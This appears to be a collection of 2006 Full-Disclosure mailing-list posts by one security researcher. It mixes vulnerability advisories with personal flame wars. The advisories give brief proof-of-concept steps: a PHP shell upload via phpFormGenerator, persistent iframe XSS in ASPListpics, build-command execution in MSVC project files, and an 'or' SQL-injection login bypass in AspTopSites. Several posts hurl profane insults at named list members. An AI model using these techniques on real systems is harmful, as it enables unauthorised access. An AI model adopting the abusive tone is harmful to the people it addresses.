you're wasting my time.
btw.. just so that you know, i have been on openbsd's development
team, written the opengl kit for the openbeos OS project (now Haiku),
and am an official GNU maintainer:
http://www.gnu.org/people/people.html (search for my name) ... what
you should be doing is thinking about how contributing to the
opensource community and not being a bitch.



PROOF OF CONCEPT

1.browse to the default install directory

2.create new form with the file upload function

3.complete the form using Insert data to MySQL database table? = no

4.as directed browse to http://[host]/[appdir]/[newform_name]/form1.html;

5.upload phpshell type of script

6.if you supplied an email address, the link will be sent to you
  http://[host]/[appdir]/[newform_name]/files/thescript_name_generated.php


CREDITS
===
This vulnerability was discovered and researched by 
Donnie Werner of exploitlabs


Donnie Werner
Information Security Specialist
[EMAIL PROTECTED]
[EMAIL PROTECTED]

--
web: http://exploitlabs.com

http://exploitlabs.com/files/advisories/EXPL-A-2006-004-phpformgen.txt

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Amazon, MSN vulns and.. Yes, we know! Mostsites have vulnerabilities

[Morning Wood]

 What I am worried about for the moment is milw0rm. That site releases 
 an
 average of 6 or 7 zero day exploits a day.  It has increased the 
 workload I

 have letting our IT folks know about new threats. A lot of these
 vulnerabilities are web/php based but pwn3d is pwn3d.


if you had a clue you would realize that the majority ( my guess is 98% ) of 
the
exploits on Millw0rm are not 0day, but are in fact released after vendor 
patches

are available. ( mabey str0ke could help with his guess on the percentage )

for those that are released without vendor patches,
they are generally due to the fact the the vendor is:
1. not contactable
2. non responsive to the researcher
3. ignorant

in cases 2 and 3 ( common ) the researcher releases them to HELP bring the
awareness to the vendor and users that foobar software is buggy and need 
be
either fixed by the vendor or removed by users and replaced by a better 
solution.


I suppose you would rather these float around only in the underground and
then you would have NO clue as to how you got pwn3d, possibly you should
have gotten into the offensive security side of things so you dont have to 
worry
instead of going for the classic defensive security position you obviously 
dread.


clue up!

MW

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Amazon, MSN vulns and.. Yes, we know! Mostsites have vulnerabilities

[Morning Wood]

I completely agree with the milw0rm point. The intent of my reply was to
remind MW that he too was a clueless one ( in recent times at that ) and
that he would be well served to spare others the abuse he got when he
was learning. The incivility of FD and the space in general is a bit 
tiring.


well, i may have to also agree that my choice phrasing was abit... imature.
next time i will wait to reply after my 2 cups of coffee. ( thanks for
the deserved slap in the face Jason )

however, i still stand by the fact that full disclosure style of reporting
security flaws has prompted many vendors to be more dilligent in fixing
issues and working with persons who discover vulnerabilities, as well
as doing more in-house testing and auditing.

further, IMHO, it is better to have exploit code publicly
available than solely being controlled and utilized by the blackhat
underground, which makes the internet an actual safer place for
everyone. ( see previous paragraph )

cheers,
mw


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] researchers want slice of profit and vow pull outof mailing list disclosures

[Morning Wood]

hi n3td3v
you boast that you are moderated to people saying that John Cartwright is 
on my side cuz he lets my posts through  hahahah what a JOKE

further, you realy need to stop spamming me on YahooIM...

n3td3v: im about to deface zone-h
n3td3v: the joomla cms is full of vulns
n3td3v: u peice of shit
n3td3v: bye

yea, real mature there mr big international security boi 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] researchers want slice of profit and vow pulloutof mailing list disclosures

[Morning Wood]

This is what really happened...

mw: deface zone-h for me
n3td3v: why?
mw: cos i hate the new layout
n3td3v: lol
n3td3v: k give me the password to zone-h
mw: ok, hold on n3td3v
mw: e-mail sent, the password is in the e-mail
n3td3v: cool, thanks
n3td3v: lol, it works!
n3td3v: i thought you were joking me
mw: no probs n3td3v
mw: just remember, this conversation never happened k?
n3td3v: sure


here is the actual convo...

n3td3v : why did you post the i.m?
Morning Wood: just like your contryman Phill Collins says... true colors
n3td3v : hahahahahahaha... you know i.m's are easily forged
Morning Wood: yes bet we know its genuine, and i dont make up anything, 
thats the difference between us

n3td3v : i could post one as well saying you were going to deface zone-h too
Morning Wood: yea, you need lies
n3td3v : infact, i could post one saying you gave me exploit code to do it
n3td3v : mw: deface zone-h for me
n3td3v : n3td3v: why?
n3td3v : mw: cos i hate the new layout
n3td3v : n3td3v: lol
Morning Wood: funny, cuz im z-h staff and speak to Roberto daily
n3td3v : n3td3v: k give me the password to zone-h
Morning Wood: not to mention i showed him that when you im'd it
n3td3v : mw: ok, hold on n3td3v
n3td3v : mw: e-mail sent, the password is in the e-mail
n3td3v : n3td3v: cool, thanks
n3td3v : n3td3v: lol, it works!
n3td3v : n3td3v: i thought you were joking me
n3td3v : mw: no probs n3td3v
n3td3v : mw: just remember, this conversation never happened k?
n3td3v : n3td3v: sure


now plz go away

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] microsoft france attack details

[Morning Wood]

Zone-h has had an interview with the cracker who defaced 
http://experts.microsoft.fr and details the method of attack. 0day or 
corporate ignorance?


Full story:
http://www.zone-h.org/content/view/4770/31/


Donnie Werner
http://zone-h.org
http://exploitlabs.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Microsoft-fr defaced

[Morning Wood]

Microsoft France was defaced today by Turkish hackers.
http://experts.microsoft.fr/default.aspx

a story and a mirror of the defacement are available on Zone-h

story:   http://www.zone-h.org/component/option,com_frontpage/Itemid,1/
mirror: http://www.zone-h.org/index2.php?option=com_mirrorwrpid=4181592


Donnie Werner
http://zone-h.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Want to test this desktop barrier?, (Unauthorized offer) 0day protection

[Morning Wood]

Dick, err Bill,
odd product you have...
anything i tried to run via GreenBorder simply, how do I say this... DID NOT 
RUN PERIOD.


I am amazed at the effectiveness of your product, it's great! I was fully 
protected from not being able to do anything at all with your product, 
simply amazing. When I tried to run Internet Explorer, it simply would not 
run!!! I was obviously fully protected from all threats, again Dick, err 
Bill, big props to your Product! Now, being one that just has to back up my 
security product research, I uninstalled your product to compare my computer 
use and Internet browsing without your Product's protection. After a reboot 
see now that my HTML icons are now back with that blue e, not that BIG 
GREEN SQUARE THINGIE, ( an obvious sign of not being protected ) although I 
can actually open them now, as well Internet Explorer itself now opens ( I 
think I'm at rick now huh? )  In my opinion this Product is effective, or 
not, depending on you Marketing stance and spammimg of security lists 
touting a questionable product, that offers nothing that I can see of value.


cheers,
MW 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ASPListPics

[Morning Wood]

- EXPL-A-2006-003 exploitlabs.com Retro Advisory 001 -

 - ASPListpics -




RETRO-RELEASE DATE:
===
Nov 11, 2004

Duplicate Release: June 06, 2006
by: r0t
http://pridels.blogspot.com/2006/06/asp-listpics-43-xss-vuln.html
http://secunia.com/advisories/20517/


OVERVIEW

ASPListpics is a highly configurable ASP application that automatically
generates fast thumbnail web indexes of images in a folder structure.



AFFECTED PRODUCTS
=
ASPListpics 4.x
http://www.iisworks.com



DETAILS
===
1. XSS ( persistant )



PROOF OF CONCEPT LINKS AND RETRO-POC
=
1. XSS ( Cross Site Scripting )

There is persistant XSS inclusion in the comments
feature of ASPListpics in the following:

field name
field comment

By embedding various types of XSS into the comment
section, we are able to render javascript in the
users browser.

below is a simple PoC ( Proof of Concept )

enter into the comments section malicious script.
comment: ohnoiframe src=http://whatismyip.com;/iframeouch

and is rendered as:
HTTP://[VUNERABLEHOST]/listpics/listpics.asp?a=rateID=[PICID]Info= 
SCRIPTING HERE 9000|0




CREDITS
===
r0t - http://pridels.blogspot.com/2006/06/asp-listpics-43-xss-vuln.html



RETRO-CREDITS
=
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs. At the original time
of discovery and retro-release date, the author was
not aware of any other advisories or patches available.

Retro-Advisories are released when either the same research
is released by a 3rd party, old private research that is no longer
active, or the product has been patched due to Vendor updates
before a formal Exploitlabs advisory was released to the public.


Donnie Werner
[EMAIL PROTECTED]
[EMAIL PROTECTED]

--
web: http://exploitlabs.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] **LosseChange::Debunk it??**

[Morning Wood]

Pentagon Crash Footage released today

http://www.judicialwatch.org/flight77.shtml

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] **LosseChange::Debunk it??**

[Morning Wood]

the only fact worth investigating in this is the sales of stocks leading 
up to 911.
 viewed from a technical standpoint on the pentagon attack and the towers 
collapse... well this is just pure bullshit. anyone with basic physics and 
any amount of avation experience can see the author is absolutly clueless in 
regards to these technical points.


my2bits,
MW 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MSIE (mshtml.dll) OBJECT tag vulnerability

[Morning Wood]

Your blog seems to suggest that you are also quite severely mistaken in
regard to my identity.

 Secunia did not notify Microsoft ahead of time in order to allow for
 them to patch it before it became public. [...] Microsoft chided
 Zalewski [from Secunia] for jumping the gun and posting his findings
 before a comprehensive patch could be created, but the researcher is
 unapologetic.

But that's for you to figure out what's wrong in that picture.


I will take a shot in the dark here... you do not work for Secunia.
and yes... bad blogging is far worse than any 0day, it does nothing but 
provide

inacurate information, hysteria and FUD.
Tim... next time you decide to try to write a comprehensive blog entry, do 
some
research first. ( and stop relying on the footer to try to decypher who 
someone is or not )


Secunia sponsors the FD list, and is not the releasing enity in this case.

DAMN THE BLOGGERS!!!

cheers,
MW

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Internet Explorer User Interface Races, Redeux

[Morning Wood]

Game's up, n3td3v.  You can quit hiding behind your fake Yahoo account
now.  Go away kid, before you hurt somebody.


owned!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Secunia illegal spam and advisory republication

[Morning Wood]

When you subscribe at grok.org.uk, you are not made aware that
Secunia is affiliated with the mailing list and fails to warn users that
a Secunia URL will be placed at the bottom of a user or company disclosure.


what you fail to see is... we don't care.
Further, any information a researcher discloses in public is just that, 
public.
Since you are hellbent on leather here... your oh so loved Securityfocus / 
Bugtraq
does the same thing. Many of my own advisories are put on Bugtraq without me 
submitting directly. I guess http://www.osvdb.org is just as guilty? Perhaps 
Milw0rm too?


You are mad because you have never once had any information disimenated by 
any security site, why? Cuz you dont do any research, find vulns, write 
exploits or have disclosed anything worthy of publication. Further, because 
of your continued drunken rants, lack of professionalisim and just plain 
stupidity you never will be a player in the security industry. You fail 
to see that these faults are yours, and yours alone.


As I have said before... get sober, stfu and get a real life.  We here ( and 
the big media you are trying desperatly trying to attract ) don't give a 
rats ass about you, your drunken meglomaniacal disposition, or anything you 
do... PERIOD.


stfu kthnx bai,

MW




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Secunia illegal spam and advisory republication

[Morning Wood]

No, Mlw0rm tells you who discovered the vulnerability, as do other
sites. Although Secunia tell you it was all their work. I bet you
would be pretty pissed if you post one of your XSS or SQL injection,
and it appears on the Secunia website the next day saying Secunia
FOUND. 


WRONG WRONG WRONG

you cant even backup your rant with facts can you?

http://secunia.com/search/?search=Donnie+Werner

THANKS FOR PLAYING !!!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Secunia illegal spam and advisory republication

[Morning Wood]

You think? I have setup a webpage to tell you what I think of you and
everyone else. http://geocities.com/n3td3v who doubts me. One time I
added you to Yahoo Messenger thinking you were a friend but you just
walk all over me like everyone else. Screw you man


thats right, YOU added me ( i never was your friend ) and I tried to
warn you about yourself, your drunkeness, and your skewed outlook
on life.

I think it's funny after I showed you were wrong about Secunia,
you now go off on some other rant and roll. ( drop some more eX ok ).
Instead you point to some extremely idiotic page that itself shows just how
lame you are, your delusions of grandure and the fact that you just plain 
suck.


Stop thinking people are your friends, and actualy try to find a friend
( if they can put up with your paranoid drunk ass that is )


You say you're someone elite, but all you've done is XSS and SQL
injection (copy and paste hacking). ANyway, read the webpage hotshot.


I may not have produced the most ground breaking exploits and vulns,
but I have something you will never atain, and that is RESPECT.

I seriously suggest attacking someone who cant think for themselves,
dont have a clue, and are within your own peer group
( preeschool - kindergarten )

 cheers,
MW 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Secunia illegal spam and advisory republication

[Morning Wood]

Correction: You have never attained respect from anyone.


since you are a bantown troll, I will just disregard you

bai

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Argeniss] Alert - Yahoo! Webmail XSS

[Morning Wood]

Yahoo! Mail once in a while will ask you
to re login again so it's not so anormal.


I use Yahoo Mail, I have never once had to re-login in 4 years.

dunno...

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Argeniss] Alert - Yahoo! Webmail XSS

[Morning Wood]

exploit creates a frameset and redirects to
http://w00tynetwork.com/x/ ,it's interesting that the


redirects to http://211.22.14.50/.yahoomail/x.htm and spoofs a Yahoo login 
page.
upon entering credentals, the site redirects back to http://mail.yahoo.com 
so it simply looks like a bad login.


211.22.14.50 = www.gbigift.com.tw

cheers,
mw 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Argeniss] Alert - Yahoo! Webmail XSS

[Morning Wood]

reflecting on this...

the offending url you give is http://w00tynetwork.com/x/
which contains a fake yahoo login ( for webmail )
(( and other exploits embedded within the site ))


you state this is a Yahoo Email vulnerability.

stop me if im wrong...
why would anyone be vulnerable to a Yahoo login redirect phish, if in fact 
they are already logged in to read the mail in the first place.


i can appriciate the possibility of XSS within the Yahoo webmail interface, 
just not

with this particular redirect code ( or site url ) you provide.

XSS could be more effectivly used to leverage a browser exploit, rather than 
( trying to )

steal your credentals ala phishing

2cents,
MW 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Industry calls on Microsoft to scrapPatchTuesday for Critical flaws

[Morning Wood]

- Original Message - 

From: n3td3v [EMAIL PROTECTED]
The problem here is, many of the n3td3v bashers are secretly blackhat 
trolls

(like morning wood etc) and don't add to the discussion of eEye and others


ex-fucking-scuse me? grow up you drunk idiot. 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Industry calls on Microsoft to scrap PatchTuesday for Critical flaws

[Morning Wood]

Sorry to say the n3td3v group
more like Sorry to say n3td3v group does not exist ( kinda like your 
brain )


umm, there is no n3td3v group
so please stop using that phrase, your just trying to make yourself look 
big and professional to the media / vendor personage that reads this 
list.


.. and that you have a group of rogue employees ( trying to make like 
there are bonafide sec researchers working for your group )  [ insert much 
lmfao here ]


n3td3v... you are chum, bait, food, just waiting to be extruded out of some 
orifice like the smelly nasty mess you are.


NOW PLZ STFU KTHNX 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Arin.net XSS

[Morning Wood]

same issue that internic had a few years 
ago..
http://lists.grok.org.uk/pipermail/full-disclosure/2003-May/005092.html

cheers
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Filemaker Pro 7 - any known exploits/hacksavailable?

[Morning Wood]

- Original Message - 
From: Knud Erik Højgaard [EMAIL PROTECTED]
Pay me for an audit (I will find a bug and give you ammo to say NO),
or hire a(n expensive) company like corest/ilja,suresec(not
expensive)/eeye/lsd.pl/immunitysec(hi dave)/phenoelit(hi FX) to do the
same. I am probably cheaper, they are probably(yeah right, they
certainly are) better.
--
Knud

hard up for 0days are ya Kokanin?
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MBT Xss vulnerability

[Morning Wood]

in all honesty, XSS is a serious vector of 
attack.
however, non-persistant XSS is a much less serious 
problem
than is persistant XSS. Generally XSS is of no harm 
to the server
side anyway. It can however be leveraged as the OP 
said, but
would require a dedicated, pre-formed url 
string that needs to
be presented to the user to be effective. IMHO the 
OP advisory
should not have been posted, because of the 
non-persistant nature
of the flaw at one dedicated 
site.

Issues comes into play via persistant 
XSS, which is 
script that may
be embedded in a web application, such as a guestbook, or 
comment
section, where people would travel to on their own without the 
need of
a direct link and then rendered upon visitation in 
the users browser.
Further, in todays world of browser exploitation, cookie, session,
and/or credential theft is not the only thing to be gainedand is often
of minor importanceand information. What is bad is leveraging 
XSS
as a vector for browser exploitation ( can we say IFRAME+WMF ),
so you have a way, via XSS to COMPROMISE end users systems.

While the OP does have a valid initial point and 
theory,
1.it is not persistant in nature
2. it is one site, and not a script used on many 
sites
3. it does require SE at some level to be 
effective
4. it should not have been posted to FD ( see 
points 1,2,3 )


my2bits,
MW














___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Security Bug in MSVC

[Morning Wood]

 What's the point of building a bunch of sources unless
 1. you trust their author, or
 2. you have made sure their is nothing malicious there?
 
 When you build an executable from untrusted sources, you get an untrusted
 executable. Either you run it and you're screwed anyway, or you don't run
 it and you wasted your time building it.
 

again...

this does not exploit the source code.
it does exploit the build files.

if i was simply compiling badprog.c
then launching it, that would be stupid.

i am leveraging the project files, not the source code.

MW
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Security Bug in MSVC

[Morning Wood]

 In all this, I am discounting the fact that if someone is building
 untrusted sources, (s)he is most likely going to run the untrusted
 program afterwards.

this does not run an untrusted program.
if you noted, I named it a feature bug
and my poc is a simple hello world sample

Judging from MS extensive information to me,direct from MSRC, this is an
issue.
remote code can be pulled in and executed without any
notice or warning to the user.
I am not leveraging directives for CPP ( cc is the Makefile eqiv)

MSVC tends to hide ( especially these actions ) to the end user.

cheers,
Donnie
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] PC Firewall Choices

[Morning Wood]

 I am looking at supplementing the Windows XP (Pro) SP2 Firewall with a
third
 party product on a bunch of Windows machines.

not to plug a product, but
http://force.coresecurity.com/

 I have recieved many kudos after recommending this to several people.

my2bits,
MW
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Security Bug in MSVC

[Morning Wood]

 - EXPL-A-2006-002 exploitlabs.com Advisory 048 -


  - MSVC 6.0 run file bug -




AFFECTED PRODUCTS
=
Microsoft Visual Studio 6.0
http://microsoft.com

Possibly other products referenced in:
http://support.microsoft.com/kb/841189



OVERVIEW

Source code project distributions are very popular these days.
Generally authors offer code as a project with source, headers,
and msvc project files if it is a fairly big project. Most users
will simply open up the project.dsw file, ( especialy if it says
to do so in a readme.txt or other compiler instructions ) which
in turn loads the project.dsp files, which provides the compiler
directives.
A malicious attacker could embed commands to be executed in the
project files, and execute any local code of his choosing.

note: this is an implemented feature in MSVC, and should be
considered a bug, not a vulnerability.



IMPACT
==
The impact of this is quite severe, as it is possible to script
commands such as to launch ftp, retrieve and execute a file from
a remote location.




DETAILS
===
By modifying the .dsp files:

project
settings
custom build
Commands: command to execute
Post-build Step: command to execute


1.a

InputPath=.\Release\hello.exe
SOURCE=$(InputPath)

hello.exe : $(SOURCE) $(INTDIR) $(OUTDIR)
 calc

1.b

PostBuild_Cmds=notepad.exe



POC

http://exploitlabs.com/files/advisories/msvc-featurebug-POC.zip

extract, and open hello.dsw
click batch build, build or rebuild all
code will execute ( calc.exe and notepad.exe used as an example )
calc.exe = Custom-Build
notepad.exe = PostBuild Commands



SOLUTION

vendor contact:
[EMAIL PROTECTED] Sept 20, 2005
http://support.microsoft.com/kb/841189 updated Jan 6, 2006

Microsoft provided these URL's as well:
http://msdn.microsoft.com/library/en-us/vsintro7/html/vxurfopenprojectfromwebdialogbox.asp
http://msdn2.microsoft.com/en-us/library/bs2bkwxc.aspx




SUGGESTED PATCH
===
Include a dialog box that warns the user, before pre and post
build directives can be launched, if the presence of execute
directives exist in the build project files.




CREDITS
===
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs


mail:   wood at exploitlabs.com
mail:   morning_wood at zone-h.org
-- 
web: http://exploitlabs.com
web: http://zone-h.org

http://exploitlabs.com/files/advisories/EXPL-A-2006-002-msvc-featurebug.txt
http://exploitlabs.com/files/advisories/msvc-featurebug-POC.zip
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] AspTopSites SQL injection

[Morning Wood]

- EXPL-A-2006-001 exploitlabs.com Advisory 047 -

 - AspTopSites -






AFFECTED PRODUCTS
=
AspTopSites
http://www.maine-net.com/aspts.asp



OVERVIEW

AspTopSites® runs on your Windows NT/2K/2003 Server
 and uses Active Server Pages with a MS Access 2000 database.
 Simply upload AspTopSites®, make one configuration setting
 and you're ready to start running your own TopSites traffic
 generator.  AspTopSites® comes with full source code...
 no encoding or DLLs need to be installed on the server.





DETAILS
===
1. SQL Injection

AspTopSites does not filter SQL resulting in
full access to the user manager menu.




POC
===

1.
---

entering SQL Injection type statement in the password field
causes the statement to be true.

http://[host]/topsites/default.asp --- view listings
http://[host]/topsites/goto.asp?id=43 --- mouseover id value
http://[host]/topsites/includeloginuser.asp --- login here
user: [ id value ]
password: 'or'


note: Vendor Demo Site is Vuln



SOLUTION:
=
vendor contact:
Jan  3, 2006 [EMAIL PROTECTED] ( no resp )
Jan 10, 2006 ( no resp = release )



Credits
===
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs

Donnie Werner

mail:   wood at exploitlabs.com
mail:   morning_wood at zone-h.org
-- 
web: http://exploitlabs.com
web: http://zone-h.org

http://www.exploitlabs.com/files/advisories/EXPL-A-2006-001-asptopsites.txt
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] How to Determine My System Vulnerabilities

[Morning Wood]

  I know I feel like the Federal Reserve is safe now.

well..., the headers appear to be genuine
IS THIS FOR F*CKING REAL 

The director for IT of the FDRB of Minneapolis is asking the most basic
question possible. ARE YOU SERIOUS?!?!?


I have three servers running Linux Red Hat OS.  I would lke to find a
source for information regarding How Too when it comes to determining
what level of kernel, SSH, PHP, ect my servers are running.  I do know how
to check some of these things but am looking for someone who is very
knowledgeble and is willing to answer questions about this OS.

HOW DID YOU EVEN GET THE JOB???

I BET YOU TOOK A TEST AND HAVE SOME BIG FANCY LETTERS *sigh*

this ignat is making what? 75-125k$ / yr and dont know
how to get versions from his daemons?!?!  wtf wtf wtf omg omg omg

*shocked and awed*
/me falls over
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: SecurID with Active Directory ?

[Morning Wood]

 [If, for instance, you really need to completely eliminate access via
 passwords, you could use some programmatic method (i.e., Visual Basic) to
 set your users' Windows passwords to very long, random passwords that
 never expire. The password change would be captured on the DC and sent to
 the ACE/Server. The long, random passwords would then be
 provided with each authentication (and recovered when offline), but the

 I belive you are meaning a custom VB login.exe at every user station?

 users will never know their Windows password.

unless of course they take to time to look in the custom vb login.exe
application,
where the user/pass is stored in clear text. This would also be a point of
attack
if the exe were ever to escape outside infrastructure controls. ( I bring
this up as
this exact vector was used successfully in a pentest, the exe asked for a
user/pass,
the application then allowed access to the ftp server and its credentials
were stored cleartext
in the exe. The developer belived he could hide the actual ftp process from
the end user so
they did not need to set up user accounts on the ftp server and using the
exe to validate
against an asp server, thus allowing the application to validate and run. )

although not quite the scenario you describe, i believe the implications
would be the same.
of course, I could be completely off base

MW
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: what we REALLY learned from WMF

[Morning Wood]

 I do know that MS prefers to do extensive testing on patches.
ms04-015 , i was told, had to go through over 200 differing
infrastructure / product / implimentation testings before release.
i am sure some of these test are done for large corps to ensure
no breakage across a multitude of architectures, etc. A patch
may work properly on 99% of everything, but its that 1% they
focus on before formal release. ( esp if that is a large enterprise )

my2bits,
MW
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Unofficial Microsoft patches help hackers, not security

[Morning Wood]

 everyone knows the best official patch is firefox
 
umm, no
firefox presents a save or open dialog box.
if the user belives it to be a image he / she is
intended to view, they will simply open.
thus, windows gladly passes the extention
handler to WMF, game over.
or, they will save and simply passing the
mouse over the icon will trigger the exploit,
again... game over
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Trojan found on Linux server

[Morning Wood]

 Yep, when running strings on it I noticed a few IP addresses 
 (219.133.46.212, 61.211.239.84, 64.239.9.236) in there as well as 
 commands indicative of IRC (NOTICE, NICK, PRIVMSG, etc.)

64.239.9.236 = copticpope.tv
http://64.239.9.236/  http://copticpope.tv heh?














___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] new attack technique? usingJavaScript+XML+OWSPost Data

[Morning Wood]

Gaurav,
 go back to using Cain to spy on your co-workers for your corrupt boss.
and btw, you dont hack servers then go to the company to ask for a tender
to provide security services ( its called blackmail, but I guess that prety
common
in Hyderabad ). Have a nice life backstabber!

cheers,
MW
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] XSS vulnerabilities in Google.com

[Morning Wood]

i see no "n3td3v" credits here... further, i cant 
concieve of the fact that you would even know what UTF-7 encoding 
is.
IMO all you have ever done is notice weird behavior 
when info is pulled into your Google group ( like your 1st post about google 
groups about 9 months ago or so ) from other sources ( or replies ). XSS can be 
bad or benign depending on if it is persistant in nature or not ( if not it 
requires a user to click a preformed XSS url ). And yes, persistant XSS can be 
used to root users if coupled
with the latest browser exploit ( and any admin 
behind the sites firewall / corporate infrastructure ). 
In the future may I suggest the 
folowing

1. find your flaw
2. write an advisory
3. send it to the vendor
4. wait for response
5. wait for patches
6. disclose advisory formaly
7. stfu and find your next flaw

cheers,
mw




  
  
  //= Security Advisory 
  =//
  
  -
  XSS vulnerabilities in 
  Google.com
  -
  
  --[ Author: Yair Amit 
  , Watchfire Corporation http://www.watchfire.com
  --[ Discovery Date: 
  15/11/2005
  --[ Initial Vendor 
  Response: 15/11/2005
  --[ Issue solved: 
  01/12/2005
  --[ Website: 
  www.google.com 
  --[ Severity: 
  High
  
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] BANTOWN PRESENTS: Give me 0day or give me death

[Morning Wood]

troll go home
http://www.encyclopediadramatica.com/index.php/Bantown

i think we can all see the seriousness of this OP ( 
not )

and next time... tell your cronies IP-Relay phone 
is traceable,
not to mention against the law to make harassing 
calls over its
service

happy hollidays ( i bet your bbq sauce is frozen 
about this time of the year )

mw

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [scip_Advisory] NetGear RP114 Flooding Denial ofService

[Morning Wood]

dunno, but i know this has been an issue since the rt314 product (
1999-2000? )
a simple nmap -sS target trigers it external, and no supprise internal as
well.
( not fun running pentests behind one of these babys )
i dont know if you noticed that existing connections dont appear to be
affected
( IM and streaming traffic ) but dns generally gets hosed.

my2bits,
Donnie Werner
http://exploitlabs.com

___
Full-Disclosure - We believe in it.
